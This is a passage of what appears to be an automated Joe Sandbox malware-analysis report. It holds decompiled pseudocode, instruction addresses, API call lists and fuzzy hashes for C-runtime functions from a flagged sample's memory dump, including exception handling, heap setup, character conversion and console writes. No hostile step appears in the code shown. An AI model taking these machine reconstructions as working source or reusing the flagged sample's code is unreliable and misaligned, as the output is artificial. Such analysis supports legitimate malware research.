                                                                                            				_v540 = _v0;
                                                                                            				_t49 =  &_v0;
                                                                                            				_v528 = _t49;
                                                                                            				_v724 = 0x10001;
                                                                                            				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                                                            				_v804 = _a8;
                                                                                            				_v800 = _a12;
                                                                                            				_v792 = _v0;
                                                                                            				_t66 = IsDebuggerPresent();
                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                            				_t57 = UnhandledExceptionFilter( &_v812);
                                                                                            				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
                                                                                            					_push(_a4);
                                                                                            					_t57 = E00401E6A(_t57);
                                                                                            				}
                                                                                            				E004018CC();
                                                                                            				return _t57;
                                                                                            			}






































                                                                                            0x0040446f
                                                                                            0x0040446f
                                                                                            0x0040446f
                                                                                            0x0040447a
                                                                                            0x0040447f
                                                                                            0x00404481
                                                                                            0x00404488
                                                                                            0x00404489
                                                                                            0x0040448b
                                                                                            0x0040448e
                                                                                            0x00404493
                                                                                            0x00404493
                                                                                            0x0040449f
                                                                                            0x004044b2
                                                                                            0x004044c0
                                                                                            0x004044c6
                                                                                            0x004044cc
                                                                                            0x004044d2
                                                                                            0x004044d8
                                                                                            0x004044de
                                                                                            0x004044e4
                                                                                            0x004044ea
                                                                                            0x004044f0
                                                                                            0x004044f6
                                                                                            0x004044fd
                                                                                            0x00404504
                                                                                            0x0040450b
                                                                                            0x00404512
                                                                                            0x00404519
                                                                                            0x00404520
                                                                                            0x00404521
                                                                                            0x0040452a
                                                                                            0x00404530
                                                                                            0x00404533
                                                                                            0x00404539
                                                                                            0x00404546
                                                                                            0x0040454f
                                                                                            0x00404558
                                                                                            0x00404561
                                                                                            0x0040456f
                                                                                            0x00404571
                                                                                            0x0040457e
                                                                                            0x00404586
                                                                                            0x00404592
                                                                                            0x00404595
                                                                                            0x0040459a
                                                                                            0x004045a1
                                                                                            0x004045a9

                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00404567
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                                                                                            • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                                                                                            • Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                                                                                            • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E004067FE() {
                                                                                            				signed int _t3;
                                                                                            
                                                                                            				_t3 = GetProcessHeap();
                                                                                            				 *0x4132b0 = _t3;
                                                                                            				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                            			}




                                                                                            0x004067fe
                                                                                            0x00406806
                                                                                            0x0040680e

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                                                                            • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                                                                                            • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                                                                            • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 70%
                                                                                            			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                            				signed int _v8;
                                                                                            				int _v12;
                                                                                            				void* _v24;
                                                                                            				signed int _t49;
                                                                                            				signed int _t54;
                                                                                            				int _t56;
                                                                                            				signed int _t58;
                                                                                            				short* _t60;
                                                                                            				signed int _t64;
                                                                                            				short* _t68;
                                                                                            				int _t76;
                                                                                            				short* _t79;
                                                                                            				signed int _t85;
                                                                                            				signed int _t88;
                                                                                            				void* _t93;
                                                                                            				void* _t94;
                                                                                            				int _t96;
                                                                                            				short* _t99;
                                                                                            				int _t101;
                                                                                            				int _t103;
                                                                                            				signed int _t104;
                                                                                            				short* _t105;
                                                                                            				void* _t108;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_push(__ecx);
                                                                                            				_t49 =  *0x412014; // 0x471e291c
                                                                                            				_v8 = _t49 ^ _t104;
                                                                                            				_t101 = _a20;
                                                                                            				if(_t101 > 0) {
                                                                                            					_t76 = E004080D8(_a16, _t101);
                                                                                            					_t108 = _t76 - _t101;
                                                                                            					_t4 = _t76 + 1; // 0x1
                                                                                            					_t101 = _t4;
                                                                                            					if(_t108 >= 0) {
                                                                                            						_t101 = _t76;
                                                                                            					}
                                                                                            				}
                                                                                            				_t96 = _a32;
                                                                                            				if(_t96 == 0) {
                                                                                            					_t96 =  *( *_a4 + 8);
                                                                                            					_a32 = _t96;
                                                                                            				}
                                                                                            				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                                                                                            				_v12 = _t54;
                                                                                            				if(_t54 == 0) {
                                                                                            					L38:
                                                                                            					E004018CC();
                                                                                            					return _t54;
                                                                                            				} else {
                                                                                            					_t93 = _t54 + _t54;
                                                                                            					_t83 = _t93 + 8;
                                                                                            					asm("sbb eax, eax");
                                                                                            					if((_t93 + 0x00000008 & _t54) == 0) {
                                                                                            						_t79 = 0;
                                                                                            						__eflags = 0;
                                                                                            						L14:
                                                                                            						if(_t79 == 0) {
                                                                                            							L36:
                                                                                            							_t103 = 0;
                                                                                            							L37:
                                                                                            							E004063D5(_t79);
                                                                                            							_t54 = _t103;
                                                                                            							goto L38;
                                                                                            						}
                                                                                            						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                                                                                            						_t119 = _t56;
                                                                                            						if(_t56 == 0) {
                                                                                            							goto L36;
                                                                                            						}
                                                                                            						_t98 = _v12;
                                                                                            						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                                                                                            						_t103 = _t58;
                                                                                            						if(_t103 == 0) {
                                                                                            							goto L36;
                                                                                            						}
                                                                                            						if((_a12 & 0x00000400) == 0) {
                                                                                            							_t94 = _t103 + _t103;
                                                                                            							_t85 = _t94 + 8;
                                                                                            							__eflags = _t94 - _t85;
                                                                                            							asm("sbb eax, eax");
                                                                                            							__eflags = _t85 & _t58;
                                                                                            							if((_t85 & _t58) == 0) {
                                                                                            								_t99 = 0;
                                                                                            								__eflags = 0;
                                                                                            								L30:
                                                                                            								__eflags = _t99;
                                                                                            								if(__eflags == 0) {
                                                                                            									L35:
                                                                                            									E004063D5(_t99);
                                                                                            									goto L36;
                                                                                            								}
                                                                                            								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                                                                                            								__eflags = _t60;
                                                                                            								if(_t60 == 0) {
                                                                                            									goto L35;
                                                                                            								}
                                                                                            								_push(0);
                                                                                            								_push(0);
                                                                                            								__eflags = _a28;
                                                                                            								if(_a28 != 0) {
                                                                                            									_push(_a28);
                                                                                            									_push(_a24);
                                                                                            								} else {
                                                                                            									_push(0);
                                                                                            									_push(0);
                                                                                            								}
                                                                                            								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                                                                                            								__eflags = _t103;
                                                                                            								if(_t103 != 0) {
                                                                                            									E004063D5(_t99);
                                                                                            									goto L37;
                                                                                            								} else {
                                                                                            									goto L35;
                                                                                            								}
                                                                                            							}
                                                                                            							_t88 = _t94 + 8;
                                                                                            							__eflags = _t94 - _t88;
                                                                                            							asm("sbb eax, eax");
                                                                                            							_t64 = _t58 & _t88;
                                                                                            							_t85 = _t94 + 8;
                                                                                            							__eflags = _t64 - 0x400;
                                                                                            							if(_t64 > 0x400) {
                                                                                            								__eflags = _t94 - _t85;
                                                                                            								asm("sbb eax, eax");
                                                                                            								_t99 = E00403E3D(_t85, _t64 & _t85);
                                                                                            								_pop(_t85);
                                                                                            								__eflags = _t99;
                                                                                            								if(_t99 == 0) {
                                                                                            									goto L35;
                                                                                            								}
                                                                                            								 *_t99 = 0xdddd;
                                                                                            								L28:
                                                                                            								_t99 =  &(_t99[4]);
                                                                                            								goto L30;
                                                                                            							}
                                                                                            							__eflags = _t94 - _t85;
                                                                                            							asm("sbb eax, eax");
                                                                                            							E004018E0();
                                                                                            							_t99 = _t105;
                                                                                            							__eflags = _t99;
                                                                                            							if(_t99 == 0) {
                                                                                            								goto L35;
                                                                                            							}
                                                                                            							 *_t99 = 0xcccc;
                                                                                            							goto L28;
                                                                                            						}
                                                                                            						_t68 = _a28;
                                                                                            						if(_t68 == 0) {
                                                                                            							goto L37;
                                                                                            						}
                                                                                            						_t123 = _t103 - _t68;
                                                                                            						if(_t103 > _t68) {
                                                                                            							goto L36;
                                                                                            						}
                                                                                            						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                                                                                            						if(_t103 != 0) {
                                                                                            							goto L37;
                                                                                            						}
                                                                                            						goto L36;
                                                                                            					}
                                                                                            					asm("sbb eax, eax");
                                                                                            					_t70 = _t54 & _t93 + 0x00000008;
                                                                                            					_t83 = _t93 + 8;
                                                                                            					if((_t54 & _t93 + 0x00000008) > 0x400) {
                                                                                            						__eflags = _t93 - _t83;
                                                                                            						asm("sbb eax, eax");
                                                                                            						_t79 = E00403E3D(_t83, _t70 & _t83);
                                                                                            						_pop(_t83);
                                                                                            						__eflags = _t79;
                                                                                            						if(__eflags == 0) {
                                                                                            							goto L36;
                                                                                            						}
                                                                                            						 *_t79 = 0xdddd;
                                                                                            						L12:
                                                                                            						_t79 =  &(_t79[4]);
                                                                                            						goto L14;
                                                                                            					}
                                                                                            					asm("sbb eax, eax");
                                                                                            					E004018E0();
                                                                                            					_t79 = _t105;
                                                                                            					if(_t79 == 0) {
                                                                                            						goto L36;
                                                                                            					}
                                                                                            					 *_t79 = 0xcccc;
                                                                                            					goto L12;
                                                                                            				}
                                                                                            			}


























                                                                                            0x004078d4
                                                                                            0x004078d5
                                                                                            0x004078d6
                                                                                            0x004078dd
                                                                                            0x004078e2
                                                                                            0x004078e8
                                                                                            0x004078ee
                                                                                            0x004078f4
                                                                                            0x004078f7
                                                                                            0x004078f7
                                                                                            0x004078fa
                                                                                            0x004078fc
                                                                                            0x004078fc
                                                                                            0x004078fa
                                                                                            0x004078fe
                                                                                            0x00407903
                                                                                            0x0040790a
                                                                                            0x0040790d
                                                                                            0x0040790d
                                                                                            0x00407929
                                                                                            0x0040792f
                                                                                            0x00407934
                                                                                            0x00407ac7
                                                                                            0x00407ad2
                                                                                            0x00407ada
                                                                                            0x0040793a
                                                                                            0x0040793a
                                                                                            0x0040793d
                                                                                            0x00407942
                                                                                            0x00407946
                                                                                            0x0040799a
                                                                                            0x0040799a
                                                                                            0x0040799c
                                                                                            0x0040799e
                                                                                            0x00407abc
                                                                                            0x00407abc
                                                                                            0x00407abe
                                                                                            0x00407abf
                                                                                            0x00407ac5
                                                                                            0x00000000
                                                                                            0x00407ac5
                                                                                            0x004079af
                                                                                            0x004079b5
                                                                                            0x004079b7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004079bd
                                                                                            0x004079cf
                                                                                            0x004079d4
                                                                                            0x004079d8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004079e5
                                                                                            0x00407a1f
                                                                                            0x00407a22
                                                                                            0x00407a25
                                                                                            0x00407a27
                                                                                            0x00407a29
                                                                                            0x00407a2b
                                                                                            0x00407a77
                                                                                            0x00407a77
                                                                                            0x00407a79
                                                                                            0x00407a79
                                                                                            0x00407a7b
                                                                                            0x00407ab5
                                                                                            0x00407ab6
                                                                                            0x00000000
                                                                                            0x00407abb
                                                                                            0x00407a8f
                                                                                            0x00407a94
                                                                                            0x00407a96
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407a9a
                                                                                            0x00407a9b
                                                                                            0x00407a9c
                                                                                            0x00407a9f
                                                                                            0x00407adb
                                                                                            0x00407ade
                                                                                            0x00407aa1
                                                                                            0x00407aa1
                                                                                            0x00407aa2
                                                                                            0x00407aa2
                                                                                            0x00407aaf
                                                                                            0x00407ab1
                                                                                            0x00407ab3
                                                                                            0x00407ae4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407ab3
                                                                                            0x00407a2d
                                                                                            0x00407a30
                                                                                            0x00407a32
                                                                                            0x00407a34
                                                                                            0x00407a36
                                                                                            0x00407a39
                                                                                            0x00407a3e
                                                                                            0x00407a59
                                                                                            0x00407a5b
                                                                                            0x00407a65
                                                                                            0x00407a67
                                                                                            0x00407a68
                                                                                            0x00407a6a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407a6c
                                                                                            0x00407a72
                                                                                            0x00407a72
                                                                                            0x00000000
                                                                                            0x00407a72
                                                                                            0x00407a40
                                                                                            0x00407a42
                                                                                            0x00407a46
                                                                                            0x00407a4b
                                                                                            0x00407a4d
                                                                                            0x00407a4f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407a51
                                                                                            0x00000000
                                                                                            0x00407a51
                                                                                            0x004079e7
                                                                                            0x004079ec
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004079f2
                                                                                            0x004079f4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407a10
                                                                                            0x00407a14
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407a1a
                                                                                            0x0040794d
                                                                                            0x0040794f
                                                                                            0x00407951
                                                                                            0x00407959
                                                                                            0x00407978
                                                                                            0x0040797a
                                                                                            0x00407984
                                                                                            0x00407986
                                                                                            0x00407987
                                                                                            0x00407989
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040798f
                                                                                            0x00407995
                                                                                            0x00407995
                                                                                            0x00000000
                                                                                            0x00407995
                                                                                            0x0040795d
                                                                                            0x00407961
                                                                                            0x00407966
                                                                                            0x0040796a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407970
                                                                                            0x00000000
                                                                                            0x00407970

                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                                                            • __alloca_probe_16.LIBCMT ref: 00407961
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                                                            • __alloca_probe_16.LIBCMT ref: 00407A46
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                                                            • __freea.LIBCMT ref: 00407AB6
                                                                                              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                            • __freea.LIBCMT ref: 00407ABF
                                                                                            • __freea.LIBCMT ref: 00407AE4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3864826663-0
                                                                                            • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                            • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                                                                            • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                            • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 72%
                                                                                            			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                            				signed int _v8;
                                                                                            				signed char _v15;
                                                                                            				char _v16;
                                                                                            				void _v24;
                                                                                            				short _v28;
                                                                                            				char _v31;
                                                                                            				void _v32;
                                                                                            				long _v36;
                                                                                            				intOrPtr _v40;
                                                                                            				void* _v44;
                                                                                            				signed int _v48;
                                                                                            				signed char* _v52;
                                                                                            				long _v56;
                                                                                            				int _v60;
                                                                                            				void* __ebx;
                                                                                            				signed int _t78;
                                                                                            				signed int _t80;
                                                                                            				int _t86;
                                                                                            				void* _t93;
                                                                                            				long _t96;
                                                                                            				void _t104;
                                                                                            				void* _t111;
                                                                                            				signed int _t115;
                                                                                            				signed int _t118;
                                                                                            				signed char _t123;
                                                                                            				signed char _t128;
                                                                                            				intOrPtr _t129;
                                                                                            				signed int _t131;
                                                                                            				signed char* _t133;
                                                                                            				intOrPtr* _t136;
                                                                                            				signed int _t138;
                                                                                            				void* _t139;
                                                                                            
                                                                                            				_t78 =  *0x412014; // 0x471e291c
                                                                                            				_v8 = _t78 ^ _t138;
                                                                                            				_t80 = _a8;
                                                                                            				_t118 = _t80 >> 6;
                                                                                            				_t115 = (_t80 & 0x0000003f) * 0x30;
                                                                                            				_t133 = _a12;
                                                                                            				_v52 = _t133;
                                                                                            				_v48 = _t118;
                                                                                            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                                                                                            				_v40 = _a16 + _t133;
                                                                                            				_t86 = GetConsoleCP();
                                                                                            				_t136 = _a4;
                                                                                            				_v60 = _t86;
                                                                                            				 *_t136 = 0;
                                                                                            				 *((intOrPtr*)(_t136 + 4)) = 0;
                                                                                            				 *((intOrPtr*)(_t136 + 8)) = 0;
                                                                                            				while(_t133 < _v40) {
                                                                                            					_v28 = 0;
                                                                                            					_v31 =  *_t133;
                                                                                            					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                                                                                            					_t123 =  *(_t129 + _t115 + 0x2d);
                                                                                            					if((_t123 & 0x00000004) == 0) {
                                                                                            						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                            							_push(1);
                                                                                            							_push(_t133);
                                                                                            							goto L8;
                                                                                            						} else {
                                                                                            							if(_t133 >= _v40) {
                                                                                            								_t131 = _v48;
                                                                                            								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                                                                                            								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                                                                                            								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                                                            							} else {
                                                                                            								_t111 = E00407222( &_v28, _t133, 2);
                                                                                            								_t139 = _t139 + 0xc;
                                                                                            								if(_t111 != 0xffffffff) {
                                                                                            									_t133 =  &(_t133[1]);
                                                                                            									goto L9;
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            					} else {
                                                                                            						_t128 = _t123 & 0x000000fb;
                                                                                            						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                                                                                            						_push(2);
                                                                                            						_v15 = _t128;
                                                                                            						 *(_t129 + _t115 + 0x2d) = _t128;
                                                                                            						_push( &_v16);
                                                                                            						L8:
                                                                                            						_push( &_v28);
                                                                                            						_t93 = E00407222();
                                                                                            						_t139 = _t139 + 0xc;
                                                                                            						if(_t93 != 0xffffffff) {
                                                                                            							L9:
                                                                                            							_t133 =  &(_t133[1]);
                                                                                            							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                            							_v56 = _t96;
                                                                                            							if(_t96 != 0) {
                                                                                            								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                                                                                            									L19:
                                                                                            									 *_t136 = GetLastError();
                                                                                            								} else {
                                                                                            									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                                                                                            									if(_v36 >= _v56) {
                                                                                            										if(_v31 != 0xa) {
                                                                                            											goto L16;
                                                                                            										} else {
                                                                                            											_t104 = 0xd;
                                                                                            											_v32 = _t104;
                                                                                            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                            												goto L19;
                                                                                            											} else {
                                                                                            												if(_v36 >= 1) {
                                                                                            													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                                                                                            													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                                                            													goto L16;
                                                                                            												}
                                                                                            											}
                                                                                            										}
                                                                                            									}
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					goto L20;
                                                                                            					L16:
                                                                                            				}
                                                                                            				L20:
                                                                                            				E004018CC();
                                                                                            				return _t136;
                                                                                            			}



































                                                                                            0x0040822b
                                                                                            0x00408232
                                                                                            0x00408235
                                                                                            0x0040823d
                                                                                            0x00408241
                                                                                            0x0040824d
                                                                                            0x00408250
                                                                                            0x00408253
                                                                                            0x0040825a
                                                                                            0x00408262
                                                                                            0x00408265
                                                                                            0x0040826b
                                                                                            0x00408271
                                                                                            0x00408276
                                                                                            0x00408278
                                                                                            0x0040827b
                                                                                            0x00408280
                                                                                            0x0040828a
                                                                                            0x00408291
                                                                                            0x00408294
                                                                                            0x0040829b
                                                                                            0x004082a2
                                                                                            0x004082ce
                                                                                            0x004082f4
                                                                                            0x004082f6
                                                                                            0x00000000
                                                                                            0x004082d0
                                                                                            0x004082d3
                                                                                            0x0040839a
                                                                                            0x004083a6
                                                                                            0x004083b1
                                                                                            0x004083b6
                                                                                            0x004082d9
                                                                                            0x004082e0
                                                                                            0x004082e5
                                                                                            0x004082eb
                                                                                            0x004082f1
                                                                                            0x00000000
                                                                                            0x004082f1
                                                                                            0x004082eb
                                                                                            0x004082d3
                                                                                            0x004082a4
                                                                                            0x004082a8
                                                                                            0x004082ab
                                                                                            0x004082b1
                                                                                            0x004082b3
                                                                                            0x004082b6
                                                                                            0x004082ba
                                                                                            0x004082f7
                                                                                            0x004082fa
                                                                                            0x004082fb
                                                                                            0x00408300
                                                                                            0x00408306
                                                                                            0x0040830c
                                                                                            0x0040831b
                                                                                            0x00408321
                                                                                            0x00408327
                                                                                            0x0040832c
                                                                                            0x00408348
                                                                                            0x004083bb
                                                                                            0x004083c1
                                                                                            0x0040834a
                                                                                            0x00408352
                                                                                            0x0040835b
                                                                                            0x00408361
                                                                                            0x00000000
                                                                                            0x00408363
                                                                                            0x00408365
                                                                                            0x00408368
                                                                                            0x00408381
                                                                                            0x00000000
                                                                                            0x00408383
                                                                                            0x00408387
                                                                                            0x00408389
                                                                                            0x0040838c
                                                                                            0x00000000
                                                                                            0x0040838c
                                                                                            0x00408387
                                                                                            0x00408381
                                                                                            0x00408361
                                                                                            0x0040835b
                                                                                            0x00408348
                                                                                            0x0040832c
                                                                                            0x00408306
                                                                                            0x00000000
                                                                                            0x0040838f
                                                                                            0x0040838f
                                                                                            0x004083c3
                                                                                            0x004083cd
                                                                                            0x004083d5

                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                                                                            • __fassign.LIBCMT ref: 004082E0
                                                                                            • __fassign.LIBCMT ref: 004082FB
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                                                                            • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                                                                            • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                            • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                                                                            • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                            • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 27%
                                                                                            			E00403632(void* __ecx, intOrPtr _a4) {
                                                                                            				signed int _v8;
                                                                                            				signed int _v12;
                                                                                            				signed int _t10;
                                                                                            				int _t12;
                                                                                            				int _t18;
                                                                                            				signed int _t20;
                                                                                            
                                                                                            				_t10 =  *0x412014; // 0x471e291c
                                                                                            				_v8 = _t10 ^ _t20;
                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                            				_t12 =  &_v12;
                                                                                            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                                                                                            				if(_t12 != 0) {
                                                                                            					_t12 = GetProcAddress(_v12, "CorExitProcess");
                                                                                            					_t18 = _t12;
                                                                                            					if(_t18 != 0) {
                                                                                            						E0040C15C();
                                                                                            						_t12 =  *_t18(_a4);
                                                                                            					}
                                                                                            				}
                                                                                            				if(_v12 != 0) {
                                                                                            					_t12 = FreeLibrary(_v12);
                                                                                            				}
                                                                                            				E004018CC();
                                                                                            				return _t12;
                                                                                            			}









                                                                                            0x00403639
                                                                                            0x00403640
                                                                                            0x00403643
                                                                                            0x00403647
                                                                                            0x00403652
                                                                                            0x0040365a
                                                                                            0x00403665
                                                                                            0x0040366b
                                                                                            0x0040366f
                                                                                            0x00403676
                                                                                            0x0040367c
                                                                                            0x0040367c
                                                                                            0x0040367e
                                                                                            0x00403683
                                                                                            0x00403688
                                                                                            0x00403688
                                                                                            0x00403693
                                                                                            0x0040369b

                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                            • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                                                            • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                            • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 79%
